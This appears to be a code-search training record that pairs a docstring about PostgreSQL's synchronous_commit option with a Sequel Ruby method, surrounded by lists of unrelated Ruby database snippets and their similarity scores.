"def schema\n hyper_schema_link.schema\n end",
"def convert_input_dataset(ds)\n case ds\n when Symbol, SQL::Identifier, SQL::QualifiedIdentifier, SQL::AliasedExpression, LiteralString\n self.simple_table = db.literal(ds).freeze\n ds = db.from(ds)\n when Dataset\n ds = ds.from_self(:alias=>ds.first_source) if ds.joined_dataset?\n\n self.simple_table = if ds.send(:simple_select_all?)\n ds.literal(ds.first_source_table).freeze\n end\n @db = ds.db\n else\n raise(Error, \"Model.set_dataset takes one of the following classes as an argument: Symbol, LiteralString, SQL::Identifier, SQL::QualifiedIdentifier, SQL::AliasedExpression, Dataset\")\n end\n\n set_dataset_row_proc(ds.clone(:model=>self))\n end",
"def schema_ds_filter(table_name, opts)\n if table_name\n [{:c__table_name=>table_name.to_s}]\n else\n [{:t__table_type=>'BASE TABLE'}]\n end\n end",
"def table_name\n dataset.first_source_alias\n end",
"def table_name\n dataset.first_source_alias\n end",
"def tablename; datastore['TABLENAME']; end",
"def get_schema_struct(table_name)\n dbres = do_sql_command(\"DESC #{table_name};\")\n\n dbstruct = []\n\n if(dbres) then\n dbres.each_hash do | row |\n dbstruct_hash = {}\n row.each {|key, val|\n dbstruct_hash[key.downcase.to_sym] = val \n }\n dbstruct << dbstruct_hash\n end \n end\n\n dbstruct\nend",
"def schema_and_table_name\n if qualified_table_name.include? '.'\n schema_name, table_name = qualified_table_name.split('.', 2)\n else\n table_name = qualified_table_name\n schema_name = self.class.default_schema_name\n end\n [schema_name, table_name]\n end",
"def tables\r\n return @engine.tables\r\n end",
"def schema_ds_select(table_name, opts)\n cols = [:column_name___column, :data_type___db_type, :character_maximum_length___max_chars, \\\n :numeric_precision, :column_default___default, :is_nullable___allow_null]\n cols << :c__table_name unless table_name\n cols\n end",
"def index\n @schema_tables = SchemaTable.all\n end",
"def generate_dataset\n return nil if query.nil?\n # execute the query\n data = Array ActiveRecord::Base.connection.execute(query)\n return [] if data.empty?\n # Convert the query into an easy to read format\n @dataset = [data.first.keys]+data.map{|dd|dd.values}\n return @dataset\n end",
"def type\n 'dataset'\n end",
"def table; end",
"def table; end",
"def table; end",
"def table; end",
"def schema_source\n column_families\n end",
"def load_table_heading(conn, builder, table)\n primary_key_columns = []\n builder.heading{\n columns = conn.schema(table, {:reload => true})\n columns.each do |name, info|\n #puts info.inspect\n \n # find attribute definition\n defn = {:domain => dbtype_to_ruby_type(info),\n :mandatory => !info[:allow_null] }\n unless info[:ruby_default].nil?\n defn[:default] = info[:ruby_default]\n end\n \n # mark primary key columns\n if primary_key_columns and info[:primary_key]\n primary_key_columns << name \n end\n \n # build the attribute\n builder.attribute(name, defn)\n end\n }\n primary_key_columns\n end",
"def prepare_schema\n tables = [];ActiveRecord::Base.connection.execute(\"show tables\").each{|t| tables << t[0].strip}\n \n ActiveRecord::Schema.define do\n App.log.info(\"preparing schema\")\n \n unless tables.include?(\"services\")\n # a service entry\n begin\n create_table :services do |t|\n t.string :name\n t.string :status, :null => false, :default => \"active\"\n end\n add_index :services, :name\n rescue\n App.log_exception\n end\n end\n \n unless tables.include?(\"queries\")\n begin\n # queries\n create_table :queries do |t|\n t.string :query \n t.column :last_twid, :bigint, :null => false, :default => 0\n t.timestamp :last_run\n t.integer :last_result_count\n t.string :status, :default => 'active', :null=> false\n end\n add_index :queries, :query\n rescue\n App.log_exception\n end\n end\n \n unless tables.include?(\"tweets\")\n begin\n # cache of tweets\n create_table :tweets do |t|\n t.column :twid, :bigint, :null => false\n t.string :from_user\n t.string :to_user\n t.integer :from_user_id\n t.integer :to_user_id\n t.string :text\n t.string :profile_image_url\n t.timestamp :created_at\n end\n add_index :tweets, :twid\n rescue\n App.log_exception\n end\n end\n \n end # define schema\n end",
"def tables\n raise 'SevenZip#tables should never be called'\n end",
"def get(table)\n if internal?(table)\n INTERNAL_SCHEMATA[table.variable.name]\n else\n table_id = @table_manager.variable_id(table)\n Schema.new(\n @internal_evaluator.select(\n [\"column_name\", \"index\", \"type_id\", \"short_default\", \"boolean_default\", \"string_default\", \"double_default\", \"integer_default\"],\n \"schemata\",\n [\"table_id\"],\n [table_id]\n ).sort_by { |tuple| tuple[1] }.map do |tuple|\n name = tuple[0]\n type = StorageType.by_id(tuple[2])\n default = case type \n when StorageType::SHORT then tuple[3]\n when StorageType::BOOLEAN then tuple[4]\n when StorageType::STRING then tuple[5]\n when StorageType::DOUBLE then tuple[6]\n when StorageType::INTEGER then tuple[7]\n else\n raise\n end\n if default.nil?\n Column.new(name, type)\n else\n Column.new(name, type, default)\n end\n end\n )\n end\n end",
"def table\n Airmodel.client.table base_config[:base_id], base_config[:table_name]\n end",
"def tables(name = nil, schema = nil, table = nil)\n schema = schema ? \"'#{quote_string(schema)}'\" : 'CURRENT_SCHEMA'\n select_rows(\n \"SELECT table_name \"+\n \"FROM information_schema.tables \"+\n \"WHERE table_type = 'TABLE' \"+\n \" AND table_schema = #{schema} \"+\n (table ? \"AND table_name = '#{quote_string(table)}'\" : \"\"),\n SCHEMA_LOG_NAME\n ).map { |row|\n row[0]\n }\n end",
"def sqlite3_schema(table_name)\n table_schema = @dbm.sqlite3_pragma(table_name)\n\n # First, find the max lengths of each column's title strings\n # for nice print out in a fixed length of table format\n max_column_name_length = 0\n max_type_name_col_length = 22\n max_nullable_col_length = 10\n max_pk_col_length = 5\n\n table_schema.each {|schema|\n if max_column_name_length < schema[1].length\n max_column_name_length = schema[1].length\n end\n \n # Check null status and convert the stored binary value\n # into string \"YES\" or \"NO\"\n schema[3] = (schema[3] == 1 ? \"YES\":\"NO\")\n # Check primary key status and convert the stored\n # binary value into string \"YES\" or \"NO\"\n schema[5] = (schema[5] == 1 ? \"YES\":\"NO\")\n }\n\n # Print out the schema in a table format\n puts table_name\n printf \"%-5s | %-#{max_column_name_length}s | %-22s | %-5s | %-5s\\n\",\\\n \"CID\", \"NAME\", \"TYPE\", \"NULL?\", \"PK?\"\n dash_line_splitter = '-' * (50 + max_column_name_length)\n puts dash_line_splitter\n table_schema.each {|schema|\n printf \"%-5s | %-#{max_column_name_length}s | %-22s | %-5s | %-5s\\n\",\\\n schema[0].to_s, schema[1], schema[2], schema[3], schema[5]\n }\n end",
"def data\n datacolumns.reduce({}) do |t, col|\n t[col.name] = col.data; t\n end\n end",
"def tables\n table_names.map { |tn| table(tn) }\n end",
"def resource_schema\n schemated = {}\n resource.columns_hash.each { |key, value| schemated[key] = value.type }\n schemated\n end",
"def tables_from(db=current_database)\n end",
"def get_data_types(table_name) \r\n data_types = get_info(table_name, 'type')\r\n data_types.shift\r\n data_types\r\n end",
"def get_schemas\n @schemas\n end",
"def tables; ActiveRecord::Base.connection.tables; end",
"def tables\n execute(\"SHOW TABLES FROM #{@opts[:database]}\")\n .map{ |i| i.values }\n .reduce(:+)\n .map{ |i| i.to_sym }\n end",
"def metadata_table\n\t\t@store.metadata_table metadata\n\tend",
"def db_queries_table__samples\n [\n \"table1\",\n \"table2\"\n ]\n end",
"def schema\n @schema || (superclass.schema unless superclass == Model)\n end",
"def schema(table_name = nil, opts={})\n table_name = table_name.to_sym if table_name\n if opts[:reload] && @schemas\n if table_name\n @schemas.delete(table_name)\n else\n @schemas = nil\n end\n end\n\n if @schemas\n if table_name\n return @schemas[table_name] if @schemas[table_name]\n else\n return @schemas\n end\n end\n\n if table_name\n @schemas ||= {}\n if respond_to?(:schema_parse_table, true)\n @schemas[table_name] ||= schema_parse_table(table_name, opts)\n else\n raise Error, 'schema parsing is not implemented on this database'\n end\n else\n if respond_to?(:schema_parse_tables, true)\n @schemas = schema_parse_tables(opts)\n elsif respond_to?(:schema_parse_table, true) and respond_to?(:tables, true)\n tables.each{|t| schema(t, opts)}\n @schemas\n else\n raise Error, 'schema parsing is not implemented on this database'\n end\n end\n end",
"def load_physical_schema(conn, builder)\n builder.indexes{\n conn.tables.each{|table|\n conn.indexes(table).each_pair{|name, defn|\n next if defn[:unique]\n builder.index(name, {:relvar => table, :attributes => defn[:columns]})\n }\n }\n }\n end",
"def get_schema\n schema = CLIENT_TABLES.map {|t| {:name => t.table_name, :columns => table_schema(t)} }\n \n# respond_to do |format|\n# format.js { render({:content_type => :js, :text => schema.to_json}) }\n# end\n \n render_json schema.to_json\n end",
"def convert_input_dataset(ds)\n case ds\n when Symbol, SQL::Identifier, SQL::QualifiedIdentifier, SQL::AliasedExpression, LiteralString\n self.simple_table = db.literal(ds).freeze\n ds = db.from(ds)\n when Dataset\n if ds.joined_dataset?\n # raise Error, \"Using a joined dataset as a model dataset is not support, use from_self on the dataset to wrap it in a subquery\" # SEQUEL5\n Sequel::Deprecation.deprecate(\"Using a joined dataset as a Sequel::Model dataset\", respond_to?(:cti_base_model) ? \"Use the class_table_inheritance plugin :alias option in #{cti_base_model.inspect}\" : \"Call from_self on the dataset to wrap it in a subquery\")\n end\n\n self.simple_table = if ds.send(:simple_select_all?)\n ds.literal(ds.first_source_table).freeze\n end\n @db = ds.db\n else\n raise(Error, \"Model.set_dataset takes one of the following classes as an argument: Symbol, LiteralString, SQL::Identifier, SQL::QualifiedIdentifier, SQL::AliasedExpression, Dataset\")\n end\n\n set_dataset_row_proc(ds.clone(:model=>self))\n end",
"def tables\n @tables ||= {}.tap do |tables|\n parsed_data['tables'].map do |table|\n parsed_table_rows = parse_choices(table['rows'])\n tables[table['id']] = Table.new(table['name'], table['parameters'], parsed_table_rows)\n end\n end\n end"
] |
[
"0.76885384",
"0.740642",
"0.72837543",
"0.72820276",
"0.7032066",
"0.7010101",
"0.68253994",
"0.68143594",
"0.68125886",
"0.67858446",
"0.67315453",
"0.6719681",
"0.6707291",
"0.67013437",
"0.6655032",
"0.66547054",
"0.66547054",
"0.6615402",
"0.65927154",
"0.6584639",
"0.6564256",
"0.656425",
"0.65600425",
"0.65567446",
"0.6508285",
"0.6440765",
"0.641062",
"0.6408793",
"0.64084244",
"0.64076847",
"0.6384854",
"0.6379384",
"0.63643515",
"0.63489044",
"0.6339503",
"0.63239884",
"0.6276851",
"0.62630403",
"0.62517095",
"0.62517095",
"0.6243739",
"0.6235795",
"0.623286",
"0.6219354",
"0.6217911",
"0.6215517",
"0.62096596",
"0.61772376",
"0.61569136",
"0.6153807",
"0.61466694",
"0.61418897",
"0.6137816",
"0.6127764",
"0.6127173",
"0.6113112",
"0.60986084",
"0.6079736",
"0.60792327",
"0.60658413",
"0.605081",
"0.60411626",
"0.60404867",
"0.60404867",
"0.60395795",
"0.603451",
"0.6024579",
"0.6006318",
"0.59919137",
"0.5991517",
"0.597638",
"0.5973162",
"0.59496033",
"0.59496033",
"0.59496033",
"0.59496033",
"0.5935427",
"0.5922344",
"0.5914297",
"0.5910913",
"0.5894061",
"0.5894007",
"0.58925104",
"0.5875193",
"0.5867251",
"0.5855699",
"0.58537394",
"0.584956",
"0.58407843",
"0.58283335",
"0.5821317",
"0.58189356",
"0.5791877",
"0.5790935",
"0.5788976",
"0.57853466",
"0.5779224",
"0.5778865",
"0.5739416",
"0.57085997"
] |
0.73695695
|
2
|
If the :synchronous option is given and non-nil, set synchronous_commit appropriately. Valid values for the :synchronous option are true, :on, false, :off, :local, and :remote_write.
|
def begin_new_transaction(conn, opts)
  super
  if opts.has_key?(:synchronous)
    case sync = opts[:synchronous]
    when true
      sync = :on
    when false
      sync = :off
    when nil
      return
    end
    log_connection_execute(conn, "SET LOCAL synchronous_commit = #{sync}")
  end
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def synchronous_commit=(value)\n raise ArgumentError, \"argument must be true or false\" unless value == true || value == false\n\n execute \"SET #{'LOCAL' if open_transactions > 0} synchronous_commit TO #{value ? 'ON' : 'OFF'}\"\n end",
"def synchronous!\n @asynchronous = false\n end",
"def asynchronous!\n @asynchronous = true\n end",
"def synchronous?\n !@asynchronous\n end",
"def auto_commit(flag=true)\n\t\t@connection.set_auto_commit(flag)\n\tend",
"def auto_commit(flag=true)\n @connection.set_auto_commit(flag)\n end",
"def initial_commit?; end",
"def initial_commit?; end",
"def autocommit=(value)\n IBM_DB.autocommit(@conn, value ? IBM_DB::SQL_AUTOCOMMIT_ON : IBM_DB::SQL_AUTOCOMMIT_OFF)\n end",
"def autocommit=(value)\n raise NoMethodError, \"Not implemented for this raw driver\"\n end",
"def autocommit(flag)\n query \"set autocommit=#{flag ? 1 : 0}\"\n self\n end",
"def add_autocommit!(command)\n command.tap do |c|\n c[:autocommit] = false if in_transaction?\n end\n end",
"def transaction(force_sync = false, &block)\n # Ruby 1.9.3 does not support @mutex.owned?\n if @mutex.respond_to?(:owned?)\n force_sync = false if @mutex.locked? && @mutex.owned?\n else\n # If we allowed this in Ruby 1.9.3, it might possibly cause recursive\n # locking within the same thread.\n force_sync = false\n end\n if !force_sync && (@in_transaction || options[:without_mutex])\n block.call self\n else\n @mutex.synchronize do\n @in_transaction = true\n result = block.call\n @in_transaction = false\n result\n end\n end\n end",
"def transaction(&block)\n self['AutoCommit'] = false\n self.do_transaction(&block)\n self['AutoCommit'] = true\n end",
"def remote_sync_if_necessary(options={})\n false\n end",
"def sync=(value)\n\t\t\t\tsuper\n\t\t\t\t\n\t\t\t\tcase self.protocol\n\t\t\t\twhen 0, IPPROTO_TCP\n\t\t\t\t\tself.setsockopt(IPPROTO_TCP, TCP_NODELAY, value ? 1 : 0)\n\t\t\t\telse\n\t\t\t\t\tConsole.logger.warn(self) {\"Unsure how to sync=#{value} for #{self.protocol}!\"}\n\t\t\t\tend\n\t\t\trescue Errno::EINVAL\n\t\t\t\t# On Darwin, sometimes occurs when the connection is not yet fully formed. Empirically, TCP_NODELAY is enabled despite this result.\n\t\t\trescue Errno::EOPNOTSUPP\n\t\t\t\t# Some platforms may simply not support the operation.\n\t\t\t\t# Console.logger.warn(self) {\"Unable to set sync=#{value}!\"}\n\t\t\tend",
"def sync=(sync)\n if sync\n @target_stream.sync = true\n MiniTest::Unit.output = @target_stream\n end\n\n super\n end",
"def setnonblocking(enabled)\n\t\tsingleton_class.async_send_api = !enabled\n\t\tself.flush_data = !enabled\n\t\tsync_setnonblocking(true)\n\tend",
"def autocommit\n IBM_DB.autocommit(@conn) == 1\n end",
"def set_transaction_isolation(conn, opts)\n level = opts.fetch(:isolation, transaction_isolation_level)\n read_only = opts[:read_only]\n deferrable = opts[:deferrable]\n if level || !read_only.nil? || !deferrable.nil?\n sql = String.new\n sql << \"SET TRANSACTION\"\n sql << \" ISOLATION LEVEL #{Sequel::Database::TRANSACTION_ISOLATION_LEVELS[level]}\" if level\n sql << \" READ #{read_only ? 'ONLY' : 'WRITE'}\" unless read_only.nil?\n sql << \" #{'NOT ' unless deferrable}DEFERRABLE\" unless deferrable.nil?\n log_connection_execute(conn, sql)\n end\n end",
"def asynchronous?\n @asynchronous\n end",
"def async()\n merge(async: 'true')\n end",
"def autocommit=(p1)\n #This is a stub, used for indexing\n end",
"def commit!\n _commit( false )\n end",
"def tsync=(value)\n set_attr(:tsync, value ? 1 : 0)\n @tsync = value\n end",
"def sync=(arg0)\n end",
"def auto_exec(override_sync_exec: nil, override_async_exec: nil, &block)\n if override_sync_exec || override_sync_exec.nil? && !override_async_exec && sync_exec_required? && Config.auto_sync_exec? && !sync_exec_in_progress? && !async_exec_in_progress?\n sync_exec(&block)\n elsif override_async_exec || override_async_exec.to_s == 'unless_in_progress' && !async_exec_in_progress?\n async_exec(&block)\n else\n block.call\n end\n end",
"def iosync\n @tc_bdb.sync\n end",
"def sync_options; @sync_options ||= table_sync.sync_options; end",
"def force_begin_read_write\n @grpc_transaction = @connection.session.create_transaction\n end",
"def async=(value)\n @async = value == true ? default_async_processor : value\n end",
"def sync\n self.disabled_reason = nil\n if valid?\n execute_sync\n true\n else\n false\n end\n end",
"def commit mutations, transaction: nil\n mode = transaction.nil? ? :NON_TRANSACTIONAL : :TRANSACTIONAL\n service.commit project_id: project, database_id: database, mode: mode,\n mutations: mutations, transaction: transaction\n end",
"def auto_commit?\n @connection.auto_commit?\n end",
"def sync(&block)\n queue SyncCommand, [], {}, &block\n end",
"def begin_savepoint(conn, opts)\n super\n\n unless (read_only = opts[:read_only]).nil?\n log_connection_execute(conn, \"SET TRANSACTION READ #{read_only ? 'ONLY' : 'WRITE'}\")\n end\n end",
"def commit_transaction_sql\n SQL_COMMIT\n end",
"def commit_transaction_sql\n SQL_COMMIT\n end",
"def auto_commit?\n\t\t@connection.auto_commit?\n\tend",
"def autoflush=(autoflush)\n @connection.autoflush = autoflush\n end",
"def with_optional_transaction(bool, &block)\n bool ? transaction { yield } : yield\n end",
"def committed!\n @on_commit.each do |callback|\n callback.call\n end\n clear\n end",
"def commit_offsets(async: true)\n @mutex.lock\n\n internal_commit_offsets(async: async)\n ensure\n @mutex.unlock\n end",
"def commit_required?; end",
"def autocommit?()\n #This is a stub, used for indexing\n end",
"def set_async_defaults\n @async_transport_options ||= {}\n defaults = {\n queue: \"magic_pipe\"\n }\n @async_transport_options = defaults.merge(@async_transport_options)\n end",
"def is_commit()\n @is_commit\n end",
"def autocommit?\n raise NoMethodError, \"Not implemented for this raw driver\"\n end",
"def preset_eager_sync\n store = options.shift || :memory\n store = SYNC_STORES[store]&.call(config, *options) if store.is_a?(Symbol)\n self.store = store\n end",
"def perform_commit\n raise NotImplementedError\n end",
"def sync_options\n @sync_options ||= session.configuration.options_for_table(left_table)\n end",
"def supports_transaction_isolation?\n false\n end",
"def supports_transaction_isolation?\n false\n end",
"def sync\n event = :executed_command\n event\n end",
"def commit(soft_commit = false)\n session.commit soft_commit\n end",
"def begin_db_transaction\n @connection.autocommit = false\n end",
"def run!(options)\n display \"Initialising Ssync, performing pre-sync checks ...\"\n\n e! \"Couldn't connect to AWS with the credentials specified in '#{config_path}'.\" unless Setup.aws_credentials_is_valid?\n e! \"Couldn't find the S3 bucket specified in '#{config_path}'.\" unless Setup.bucket_exists?\n e! \"The local path specified in '#{config_path}' does not exist.\" unless Setup.local_file_path_exists?\n\n if options.force?\n display \"Clearing previous sync state ...\"\n clear_sync_state\n end\n create_tmp_sync_state\n\n if last_sync_recorded?\n display \"Performing time based comparison ...\"\n files_modified_since_last_sync\n else\n display \"Performing (potentially expensive) MD5 checksum comparison ...\"\n display \"Generating local manifest ...\"\n generate_local_manifest\n display \"Traversing S3 for remote manifest ...\"\n fetch_remote_manifest\n # note that we do not remove files on s3 that no longer exist on local host.\n # this behaviour may be desirable (ala rsync --delete) but we currently don't support it.\n display \"Performing checksum comparison ...\"\n files_on_localhost_with_checksums - files_on_s3\n end.each do |file|\n encrypt_file(file) if encrypting?\n push_file(file)\n end\n\n finalize_sync_state\n\n display \"Sync complete!\"\n clean_up_encrypted(true) if encrypting?\n \n end",
"def sync\n run 'sync', :quiet => true\n end",
"def sync\r\n\t\tsend('SYN', '0 0')\r\n\t\treturn 1\r\n\tend",
"def transaction(force_sync = false)\n force_sync = false if @mutex.locked? && @mutex.owned?\n\n if !force_sync && (@in_transaction || options[:without_mutex])\n yield self\n else\n @mutex.synchronize do\n @in_transaction = true\n result = yield\n @in_transaction = false\n result\n end\n end\n end",
"def perform_atomic_update(&block)\n Edition.connection.execute \"set transaction isolation level serializable\"\n Edition.connection.transaction do\n yield\n end\n end",
"def exec_sync\n raise \"You must override `exec_sync' in your class\"\n end",
"def on_prepare_commit(unit, aggregates, events); end",
"def transaction\n raise Mysql::Error, 'Not Connected' if @my.nil?\n\n if block_given?\n begin\n @my.query('START TRANSACTION WITH CONSISTENT SNAPSHOT')\n yield # Start executing the query black.\n @my.query('COMMIT')\n rescue Mysql::Error => e\n @my.query('ROLLBACK')\n raise e\n end\n end\n end",
"def supports_transaction_isolation?\n true\n end",
"def on_prepare_transaction_commit(unit, transaction); end",
"def sync=\n end",
"def sync_command local_directory\n config_file = settings[:s3cmd_config] ? \"--config=#{Shellwords.escape(settings[:s3cmd_config])}\" : \"\"\n \"#{s3cmd_program} sync #{Shellwords.escape(local_directory)} #{Shellwords.escape(s3_uri)} --no-delete-removed --bucket-location=#{settings[:region]} #{config_file} 2>&1\"\n end",
"def sync\n cached_dataset(:_sync) do\n clone(:async=>false)\n end\n end",
"def has_transactional_callbacks?\n true\n end",
"def transaction\n raise Mysql2::Error, 2002 if @my.nil?\n\n if block_given?\n begin\n @my.query('START TRANSACTION WITH CONSISTENT SNAPSHOT')\n yield # Start executing the query black.\n @my.query('COMMIT')\n rescue Mysql2::Error => e\n @my.query('ROLLBACK')\n raise e\n end\n end\n end",
"def internal_commit_offsets(async: true)\n return true unless @offsetting\n\n @kafka.commit(nil, async)\n @offsetting = false\n\n true\n rescue Rdkafka::RdkafkaError => e\n return false if e.code == :assignment_lost\n return true if e.code == :no_offset\n\n raise e\n end",
"def set_sync_status\n sync_status = ActiveModel::Type::Boolean.new.cast(directory_listing_params[:sync_status])\n if sync_status.nil?\n @directory_listing.update(sync_status: true)\n else\n @directory_listing.update(sync_status: sync_status)\n end\n end",
"def commit( defer=false )\n save_logic( defer, false )\n end",
"def begin_db_transaction\n # PG driver doesn't really do anything on setAutoCommit(false)\n # except for commit-ing a previous pending transaction if any\n log('/* BEGIN */') { @connection.begin }\n end",
"def commit\n @MySQLConnection.query('commit')\n end",
"def execute_async?\n @execution_mode == :async\n end",
"def sync_cmd\n warn(\"Legacy call to #sync_cmd cannot be preserved, meaning that \" \\\n \"test files will not be uploaded. \" \\\n \"Code that calls #sync_cmd can now use the transport#upload \" \\\n \"method to transfer files.\")\n end",
"def wake_worker_after_commit\n false\n end",
"def wake_worker_after_commit\n false\n end",
"def commit\n if defined? _commit\n if dirty?\n _commit\n end\n end\n nil\n end",
"def ensure_sync_state\n unless @ensured_sync_state\n ReplicationInitializer.new(session).ensure_sync_state\n @ensured_sync_state = true\n end\n end",
"def begin_transaction(conn, opts={})\n set_transaction_isolation(conn, opts)\n super\n end",
"def run_autosync\n begin\n self.status = _(\"Synchronizing organisations.\")\n self.update_organisation_cache\n \n self.status = _(\"Synchronizing worktime.\")\n self.update_worktime_cache\n \n self.status = _(\"Automatic synchronization done.\")\n rescue => e\n self.status = sprintf(_(\"Error while auto-syncing: %s\"), e.message)\n puts Knj::Errors.error_str(e)\n ensure\n @sync_thread = nil\n end\n end",
"def tx_commit(&block)\n @connection.send_frame(Protocol::Tx::Commit.encode(@id))\n\n self.redefine_callback :tx_commit, &block\n self\n end",
"def commit_if_dirty\n # no op\n end",
"def auto_transaction(run_with_auto_tx)\n @auto_transaction = run_with_auto_tx\n end",
"def commit_transaction(conn, opts=OPTS)\n if (s = opts[:prepare]) && savepoint_level(conn) <= 1\n log_connection_execute(conn, \"PREPARE TRANSACTION #{literal(s)}\")\n else\n super\n end\n end",
"def sync(options = {})\n assert_open\n assert_keys(options,\n :supported => [:path, :callback, :callback_context],\n :required => [:path, :callback])\n\n req_id = setup_call(:sync, options)\n\n rc = super(req_id, options[:path]) # we don't pass options[:callback] here as this method is *always* async\n\n { :req_id => req_id, :rc => rc }\n end",
"def asynchronous?() false end",
"def remove_transaction(conn, committed)\n conn.autocommit = true\n ensure\n super\n end",
"def sync() end",
"def sync() end",
"def sync() end",
"def commit_stream(shutdown=false)\n @queue = get_queue\n @queue.run # Notify other workers that the commit queue is open for business again\n # No point in continuing if we're not ready\n return :wait unless commit_ready? or shutdown\n # Convert commit_delay to ms\n lock_ttl = @commit_delay * 1000\n lock_ttl = @lock_timeout if lock_ttl < @lock_timeout\n commit_lock = false\n # Acquire a lock to prevent other workers from executing this function.\n @semaphore.lock(commit_lock_key) do |locked|\n return :wait unless locked\n # Hopefully, redlock-rb will accept our pull request so we don't need this rescue block anymore\n begin\n commit_lock = @commit_lock_manager.lock(commit_lock_key, lock_ttl)\n rescue Redis::BaseConnectionError\n return :wait\n end\n # We'll be locking API later on\n api_lock = false\n return :wait unless commit_lock\n\n begin\n # Block everybody from uploading now\n @queue.commit_status = :running\n # Keep hanging on to the commit lock until we can commit.\n while commit_lock\n # Don't commit unless we're ready or shutting down Logstash\n # Grab the lock again if we managed to lose it while sleeping\n unless commit_lock\n commit_lock = @commit_lock_manager.lock(commit_lock_key, lock_ttl)\n end\n break unless commit_lock\n # Clear out the queue\n send_to_domo(shutdown, true) until @queue.processed?(shutdown)\n # Acquire a lock on the key used for the non-commit API calls so nobody goes and creates a new Stream Execution in the middle of this.\n api_lock = @commit_lock_manager.lock(lock_key, @lock_timeout)\n break unless api_lock and commit_lock\n # Make sure the API lock and commit lock will last for at least the same amount of time.\n if commit_lock[:validity] <= api_lock[:validity]\n commit_lock = @commit_lock_manager.lock(commit_lock_key, lock_ttl, extend: commit_lock, extend_only_if_locked: true)\n end\n\n # Validate the active Stream Execution\n unless @queue.execution_id\n @queue.commit_status = :open\n break\n end\n # Do one last validation on the Stream Execution and abort if there are irregularities.\n begin\n stream_execution = @domo_client.stream_client.getExecution(@stream_id, @queue.execution_id)\n rescue Java::ComDomoSdkRequest::RequestException => e\n status_code = Domo::Client.request_error_status_code(e)\n if status_code.nil? or status_code == -1\n @logger.debug(\"We got a status code of -1 somehow. 
Let's look at the exception.\",\n :exception => e,\n :status_code => status_code,\n :message => e.to_s)\n end\n # The Execution no longer exists.\n if status_code == 404 or status_code == -1\n @queue.commit_status = :open\n @commit_lock_manager.unlock(api_lock) if api_lock\n @commit_lock_manager.unlock(commit_lock) if commit_lock\n return :open\n else\n @commit_lock_manager.unlock(api_lock) if api_lock\n @commit_lock_manager.unlock(commit_lock) if commit_lock\n raise e\n end\n end\n # Abort errored out streams\n if stream_execution.currentState == \"ERROR\" or stream_execution.currentState == \"FAILED\"\n @domo_client.stream_client.abortExecution(@stream_id, stream_execution.getId)\n @logger.error(\"Execution ID for #{stream_execution.getId} for Stream ID #{@stream_id} was aborted due to an error.\",\n :stream_id => @stream_id,\n :dataset_id => @dataset_id,\n :execution_id => stream_execution.getId,\n :execution_state => stream_execution.currentState,\n :execution => stream_execution.to_s)\n @queue.commit_status = :failed\n # Commit!\n elsif stream_execution.currentState == \"ACTIVE\"\n execution_id = stream_execution.getId\n # Block everybody from uploading again\n @queue.commit_status = :running\n sleep(0.5) # Race conditions are a PITA\n # Start the commit\n @logger.info(\"Beginning commit of Stream Execution #{execution_id} for Stream ID #{@stream_id}.\",\n :stream_id => @stream_id,\n :pipeline_id => pipeline_id,\n :dataset_id => @dataset_id,\n :execution_id => execution_id,\n :commit_rows => @queue.commit_rows,\n :execution => stream_execution.to_s)\n stream_execution = Concurrent::Future.execute { @domo_client.stream_client.commitExecution(@stream_id, execution_id) }\n until stream_execution.complete?\n sleep(0.5)\n # Keep the locks active\n if commit_lock[:validity] <= 1000 or api_lock[:validity] <= 1000\n commit_lock = @commit_lock_manager.lock(commit_lock_key, lock_ttl, extend: commit_lock, extend_only_if_locked: true)\n api_lock = @commit_lock_manager.lock(lock_key, @lock_timeout, extend: api_lock, extend_only_if_locked: true)\n end\n end\n\n stream_execution = stream_execution.value\n # Wait until the commit is actually done processing\n while stream_execution&.currentState == \"ACTIVE\"\n sleep(0.5)\n # Attempt to grab the lock again if we lost it\n commit_lock = @commit_lock_manager.lock(commit_lock_key, lock_ttl) unless commit_lock\n # Give up if we still can't get it\n return :wait unless commit_lock\n # Keep the locks active\n commit_lock = @commit_lock_manager.lock(commit_lock_key, lock_ttl, extend: commit_lock, extend_only_if_locked: true) if commit_lock[:validity] <= 1000\n api_lock = @commit_lock_manager.lock(lock_key, @lock_timeout, extend: api_lock, extend_only_if_locked: true) if api_lock and api_lock[:validity] <= 1000\n # Update the StreamExecution from the API.\n begin\n stream_execution = @domo_client.stream_client.getExecution(@stream_id, execution_id)\n rescue Java::ComDomoSdkRequest::RequestException => e\n # Almost every exception means we're done.\n status_code = Domo::Client.request_error_status_code(e)\n if status_code.nil? or status_code == -1\n @logger.debug(\"We got a status code of -1 somehow. 
Let's look at the exception.\",\n :exception => e,\n :status_code => status_code,\n :message => e.to_s)\n end\n if status_code == 404 or status_code < 400 or status_code >= 500\n break\n else\n raise e\n end\n end\n end\n # Mark the queue as successfully committed.\n commit_rows = @queue.commit_rows\n @queue.commit\n @logger.info(\"Committed Execution ID for #{execution_id} for Stream ID #{@stream_id}.\",\n :stream_id => @stream_id,\n :pipeline_id => pipeline_id,\n :dataset_id => @dataset_id,\n :execution_id => execution_id,\n :commit_rows => commit_rows,\n :execution => stream_execution.to_s)\n else\n @logger.warn(\"Stream Execution ID #{stream_execution.getId} for Stream ID #{@stream_id} could not be committed or aborted because its state is #{stream_execution.currentState}\",\n :stream_id => @stream_id,\n :pipeline_id => pipeline_id,\n :dataset_id => @dataset_id,\n :commit_rows => @queue.commit_rows,\n :execution_id => stream_execution.getId,\n :execution_state => stream_execution.currentState,\n :execution => stream_execution.to_s)\n @queue.commit_status = :failed\n end\n break\n end\n # Make sure to unlock all the locks\n ensure\n @commit_lock_manager.unlock(api_lock) if api_lock\n @commit_lock_manager.unlock(commit_lock) if commit_lock\n # Open the queue back up if the execution failed\n @queue.commit_status = :open if @queue.commit_status == :running\n end\n end\n # Return the status of the commit.\n @queue.commit_status\n end",
"def sync(options = {})\n assert_open\n assert_supported_keys(options, [:path, :callback, :callback_context])\n assert_required_keys(options, [:path, :callback])\n\n req_id = setup_call(:sync, options)\n\n rc = super(req_id, options[:path]) # we don't pass options[:callback] here as this method is *always* async\n\n { :req_id => req_id, :rc => rc }\n end",
"def begin_transaction(mutable: false, graph_name: nil)\n raise NotImplementedError\n end",
"def commit_if_dirty(soft_commit = false)\n session.commit_if_dirty soft_commit\n end",
"def run_in_transaction isolation\n if isolation\n Base.transaction isolation: isolation do\n yield\n end\n else\n yield\n end\n end",
"def run_in_transaction isolation\n if isolation\n Base.transaction isolation: isolation do\n yield\n end\n else\n yield\n end\n end"
] |
[
"0.79772484",
"0.6915001",
"0.59547013",
"0.5716413",
